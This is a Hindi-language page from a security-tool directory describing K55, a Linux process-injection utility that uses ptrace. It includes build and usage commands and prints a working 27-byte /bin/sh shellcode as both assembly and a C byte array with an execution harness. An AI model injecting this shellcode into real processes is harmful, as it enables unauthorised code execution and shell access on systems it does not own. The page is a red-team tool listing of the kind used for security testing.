Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
K55 — Linux x86_64 प्रक्रिया इंजेक्शन उपयोगिता | Kitploit
उपकरण/GitHubGitHub/josh0xa/k55
शोषणशेलकोडरेड टीमिंग
GitHubjosh0xa/k55

K55

Linux x86_64 प्रक्रिया इंजेक्शन उपयोगिता

रिपॉजिटरी देखें
591345 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

K55 - Linux x86_64 प्रक्रिया इंजेक्शन यूटिलिटी (C++14)

lisence

K55 के बारे में

(उच्चारण: "kay fifty-five")
K55 पेलोड इंजेक्शन टूल का उपयोग x86_64 शेलकोड पेलोड को चल रही प्रक्रियाओं में इंजेक्ट करने के लिए किया जाता है। यह उपयोगिता आधुनिक C++11 तकनीकों के साथ-साथ कुछ पारंपरिक C लिनक्स फ़ंक्शन जैसे ptrace() का उपयोग करके विकसित की गई है। लक्ष्य प्रक्रिया में उत्पन्न शेलकोड 27 बाइट्स का है और यह लक्ष्य के एड्रेस स्पेस के भीतर /bin/sh (एक बैश शेल उत्पन्न करता है) को निष्पादित करता है। भविष्य में, मैं उपयोगकर्ताओं को कमांड लाइन आर्गुमेंट्स के माध्यम से अपना स्वयं का शेलकोड इनपुट करने की अनुमति दूंगा।

इंस्टॉलेशन

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55

  • chmod +x build-install.sh
  • ./build-install.sh
  • K55 उपयोग

    Usage: ./K55 <process-name>

    • process-name कोई भी लिनक्स प्रक्रिया हो सकती है जिसके पास r-xp या execstack अनुमतियाँ हों।

    परीक्षण

    परीक्षण 1) एक टर्मिनल (K55/ निर्देशिका) में, चलाएँ: ./k55_example_process/k55_test_process
    परीक्षण 2) दूसरे टर्मिनल में, इंजेक्टर चलाएँ: sudo ./K55 k55_test_process

    K55 प्रभाव में

    • जब K55 शेलकोड इंजेक्टर चलाया जाता है (रूट के रूप में), तो k55_test_process में एक शेल उत्पन्न होता है।

    दी गई प्रक्रिया में इंजेक्ट करना

    लक्ष्य में उत्पन्न शेल

    सीमाएँ

    स्पष्ट रूप से, ptrace(PTRACE_POKETEXT...) कॉल्स सबसे अधिक छिपी हुई नहीं हैं। इसलिए, कुछ अनुप्रयोग K55 के प्रभाव को सीमित कर सकते हैं। हालांकि, सुरक्षा परीक्षण के लिए, सुनिश्चित करें कि आप अपने लक्ष्य अनुप्रयोगों के लिए execstack चालू करें। उदाहरण के लिए, यदि मैं gdb पर परीक्षण कर रहा हूँ, इंजेक्ट करने से पहले, मैं निम्नलिखित चलाऊंगा: sudo execstack -s /usr/bin/gdb। अपने वितरण के पैकेज मैनेजर से execstack स्थापित करें। आर्क लिनक्स उपयोगकर्ताओं के लिए, आप execstack को AUR पर पा सकते हैं।

    शेल पेलोड तैयार करना

    नोट: निम्नलिखित एक प्रदर्शन है। पेलोड स्ट्रिंग पहले से K55 में हार्डकोड की गई है।

    पेलोड का असेंबली कार्यान्वयन (shell-storm से उद्धृत (रीडायरेक्ट))

    root@kitploit:~
    main:
        xor eax, eax
        mov rbx, 0xFF978CD091969DD1
        neg rbx
        push rbx
        push rsp
        pop rdi
        cdq
        push rdx
        push rdi
        push rsp
        pop rsi
        mov al, 0x3b
        syscall
    

    पेलोड का C-कार्यान्वयन

    root@kitploit:~
    #include <stdio.h>
    #include <string.h>
    
    // Shellcode breakdown of the assembly code.
    char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
    
    int main()
    {
        printf("len:%d bytes\n", strlen(code));
        (*(void(*)()) code)();
        return 0;
    }
    
    

    संदर्भ

    http://shell-storm.org/shellcode/files/shellcode-806.php
    https://0x00sec.org/t/linux-infecting-running-processes/1097

    लाइसेंस

    MIT लाइसेंस
    Copyright (c) Josh Schiavone

    टूल डाउनलोड करें